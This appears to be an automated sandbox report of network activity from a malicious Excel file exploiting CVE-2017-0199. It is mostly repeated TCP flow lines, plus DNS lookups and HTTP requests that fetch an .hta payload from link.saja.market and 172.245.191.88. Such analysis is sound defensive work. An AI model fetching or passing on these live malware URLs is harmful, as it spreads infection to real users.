Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global traffic	TCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582

Source: global traffic	TCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 3.39.89.152 3.39.89.152
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60

Source: Joe Sandbox View

JA3 fingerprint: 258a5a1e95b8a911872bae9081526644

Source: global traffic	HTTP traffic detected: GET /l33LNEfFvd?&candidate=blushing&august=royal&manx HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /880/eswa/verysurethingsonherewithgreatthings.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /l33LNEfFvd?&candidate=blushing&august=royal&manx HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /880/eswa/verysurethingsonherewithgreatthings.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88

Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 197.87.175.4.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: link.saja.market
Source: global traffic	DNS traffic detected: DNS query: otelrules.svc.static.microsoft

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx, CC850000.0.dr	String found in binary or memory: https://link.saja.market/l33LNEfFvd?&candidate=blushing&august=royal&manxW
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.dr	String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.dr	String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/37327920121
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.dr	String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/41402421625
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.dr	String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/43296341670

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63582
